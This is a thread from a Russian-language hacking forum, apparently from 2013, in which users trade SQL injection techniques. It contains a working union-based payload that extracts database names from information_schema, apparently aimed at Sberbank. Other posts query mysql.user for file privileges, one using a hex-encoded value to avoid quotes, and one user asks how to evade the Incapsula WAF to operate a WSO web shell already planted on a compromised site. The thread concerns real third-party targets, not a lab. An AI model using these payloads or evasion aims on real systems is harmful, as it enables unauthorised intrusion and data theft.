13.12.2013, 02:42
|
|
Новичок
Регистрация: 15.06.2010
Сообщений: 0
С нами:
8372614
Репутация:
0
|
|
Подскажите какая веб-уязвимости сейчас являются наиболее распространенными? Очень хочется начать изучать веб-уязвимости, но естественно хочу начать с актуального и распространенного.
|
|
|
13.12.2013, 07:20
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сбербанк, С count(*)сложнее, но данные можно выводить:
Код:
lan=3&pid=0%26((1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)>(SELECT*FROM(SELECT*FROM information_schema.tables LIMIT 1)a1 WHERE @:=ascii(mid(TABLE_SCHEMA,1,1))))UNION(SELECT @)&type_id=2&raznovid=2&num_set=undefined
Возвращает код первого символа имени базы данных. Остаться выяснить ограничение длины у фильтра на число и можно приступать.
sabe, Здесь нормальный вывод, не blind. Если у вас получиться упростить запрос - это хорошо, но на некоторых запросах БД может надолго зависнуть, осторожно.
|
|
|
|
13.12.2013, 11:41
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2012
Сообщений: 1,266
С нами:
7388246
Репутация:
391
|
|
Доброго времени суток ачатовцы!
подскажите как обойти Incapsula WAF
есть шелл WSO. Пытаясь его открыть, когда как, то пускает, то нет, но оказавшись внутри не могу ничего исполнить сразу ловлю бан. Админки прикрыли, так что шелл последняя зацепка.
может быть кто нибудь сталкивался с этим зверем и есть решение?
судя по отчету сравнительного тестирования Incapsula WAF vs CloudFlare пробелы в защите имеются
ХЭЭЭЛППП МИ!!!
p.s Эта хрень таскает по всему сайту свои кукисы, может быть валидность вызываемых страниц сайта завязана на поле Referer и этих куках
|
|
|
|
14.12.2013, 02:55
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
Код:
https://e-pay.by/https://e-pay.by/?invaliduser
https://e-pay.by/https://e-pay.by/
https://e-pay.by/https://e-pay.by/news?page=9
что это такое? |
|
|
|
14.12.2013, 15:06
|
|
Новичок
Регистрация: 03.01.2012
Сообщений: 8
С нами:
7556726
Репутация:
0
|
|
Добрый день! Пытаюсь посмотреть, есть ли файловые привилегии у юзера, но пишет, мол в доступе отказано.
Сообщение от None
User lormedi_askort already has more than 'max_user_connections' active connections...
Сообщение от None
site.com/?item_id=5762+union+select+1,file_priv,3,4+from+my sql.user+where+user=lormedi_askort+--+
|
|
|
|
14.12.2013, 19:07
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от MrKloud
Добрый день! Пытаюсь посмотреть, есть ли файловые привилегии у юзера, но пишет, мол в доступе отказано.
если используешь запрос по выборке и кавычек нет, то к нужной записи в колонке надо хексить, пример:
Сообщение от None
site.com/?item_id=5762+union+select+1,file_priv,3,4+from+my sql.user+where+user=0x6C6F726D6564695F61736B6F7274 +--+
|
|
|
|
14.12.2013, 19:53
|
|
Новичок
Регистрация: 03.01.2012
Сообщений: 8
С нами:
7556726
Репутация:
0
|
|
Сообщение от winstrool
если используешь запрос по выборке и кавычек нет, то к нужной записи в колонке надо хексить, пример:
То же самое.
|
|
|
|
14.12.2013, 20:15
|
|
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами:
7690646
Репутация:
0
|
|
Как можно записать, чтобы значение было больше определнного..
К примеру where value=больше50
Что то понять не могу как это записать
|
|
|
|
14.12.2013, 20:20
|
|
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
С нами:
8103926
Репутация:
85
|
|
Сообщение от zombak18
Как можно записать, чтобы значение было больше определнного..
К примеру where value=больше50
Что то понять не могу как это записать
Тебе сюда
|
|
|
|
14.12.2013, 20:49
|
|
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами:
7690646
Репутация:
0
|
|
догадался после того, как отправил здесь сообщение
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
